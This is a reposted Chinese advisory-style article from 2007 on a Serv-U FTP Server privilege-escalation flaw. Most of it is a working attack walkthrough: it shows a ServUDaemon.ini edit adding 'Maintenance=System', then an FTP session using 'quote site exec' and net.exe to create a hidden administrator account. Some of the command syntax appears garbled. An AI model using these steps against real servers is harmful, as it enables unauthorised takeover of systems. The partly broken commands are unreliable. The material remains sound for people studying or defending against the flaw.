Serv-U FTP Server遠程/本地提升權限缺陷_網絡服務器

Serv-U FTP Server遠程/本地提升權限缺陷

發表于：2007-06-13來源：作者：點擊數：標簽：

本地提升權限：是遠程提升權限：是使用前提條件：對Serv-U配置文件有修改權限聲明：這只是一個提升權限的思路和方法。一、受影響的軟件 Serv-UFTPServer4.1.0.9(以及以前所有版本) 二、受影響系統 Microsoft Windows Server2003所有版本 MicrosoftWindow

本地提升權限：是遠程提升權限：是

使用前提條件：對Serv-U配置文件有修改權限

聲明：這只是一個提升權限的思路和方法。

一、受影響的軟件

Serv-U FTP Server 4.1.0.9 (以及以前所有版本)

二、受影響系統

Microsoft Windows Server 2003 所有版本

Microsoft Windows XP 所有版本

Microsoft Windows 2000 所有版本

Microsoft Windows NT 所有版本

三、綜述

Serv-U FTP Server為RhinoSoft出品的一款Ftp Sserver軟件，目前在全世界廣為使用。經我研究發現，Serv-U FTP Server的配置文件存貯于Serv-U FTP Server文件目錄下的ServUDaemon.ini文件中。如果本地受限用戶或者遠程擁有普通權限的攻擊者能接觸到該文件并精心構造ServUDaemon.ini文件中的內容就能利用Ftp進程在系統上以SYSTEM權限執行任意命令。

四、缺陷分析

Serv-U FTP Serve在設置用戶以后會把配置信息存儲與ServUDaemon.ini文件中。包括用戶的權限信息和可訪問目錄信息。本地受限用戶或者是遠程攻擊者只要能夠讀寫Serv-U FTP Serve的文件目錄，就可以通過修改目錄中的ServUDaemon.ini文件實現以Ftp進程在遠程、本地系統上以FTP系統管理員權限來執行任意命令。并且不受系統版本的影響。（用戶信息選擇“存儲與系統注冊表中”不受此缺陷影響）

五、測試方法

1、本地測試

假設本地受限用戶可以瀏覽Serv-U FTP Serve的文件目錄。找到ServUDaemon.ini文件。用記事本打開原文件大致內容為：

[GLOBAL] 

Version=4.1.0.0    // Serv-U Ftp Server 版本號 

ProcessID=584 

RegistrationKey=UEyz459waBR4lVRkIkh4dYw9f8v4J/

AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo+wAGnUBuycB 

[DOMAINS] 

Domain1=127.0.0.1||21|127.0.0.1|1|0    //主機IP以及域名,端口情況 

[Domain1] 

User1=zihuan|1|0 

[USER=zihuan|1] 

Password=rfE8DFBE3F7EC27FB043D4305A04E6D2C6 

HomeDir=c:\     // 可以瀏覽的目錄 

TimeOut=600   

Access1=C:\|RWAMLCDP

如果把ServUDaemon.in文件修改為：

[GLOBAL] 

Version=4.1.0.0 

ProcessID=584 

RegistrationKey=UEyz459waBR4lVRkIkh4dYw9f8v4J/

AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo+wAGnUBuycB 

[DOMAINS] 

Domain1=127.0.0.1||21|127.0.0.1|1|0           

[Domain1] 

User1=zihuan|1|0 

[USER=zihuan|1] 

Password=rfE8DFBE3F7EC27FB043D4305A04E6D2C6 

HomeDir=c:\ 

TimeOut=600 

Maintenance=System  //權限類型 

Access1=C:\|RWAMELCDP

以上內容比原內容多了一句“Maintenance=System”修改完成后保存。然后在用Ftp登陸到Serv-U FTP Server以后執行如下命令：

ftp>open ip     

Connected to ip. 

220 Serv-U FTP Server v4.1.0.0 for WinSock ready... 

User (ip:(none)): id  //輸入構造的用戶 

331 User name okay, please send complete E-mail address as password. 

Password:password  //密碼 

230 User logged in, proceed. 

ftp> cd winnt  //進入win2k的winnt目錄，

如果是winxp或者是windows server 2003就應該為windows目錄。 

250 Directory changed to /WINNT 

ftp>cd system32  //進入system32目錄 

250 Directory changed to /WINNT/system32 

ftp>quote site exec .net.exe user zihuan ziHUAN /add

  //利用系統的net.exe文件加用戶。 

200 EXEC command successful (TID=33). 

ftp>quote site exec net.exe localhost administrators zihuan /add

 //提升為超級用戶

這樣就在本地系統上加了一個為zihuan密碼為:ziHUAN的超級用戶。也可以直接用quote site exec net.exe localhost administrators user /add命令把當前用戶提升到超級用戶組中去。當然也可以在系統上執行任何命令。

(責任編輯：銘銘 mingming_ky#126.com TEL：（010）－68476636)

原文轉自：http://www.kjueaiud.com

軟件測試 > 測試開發技術 > 軟件測試環境搭建 > 網絡服務器 >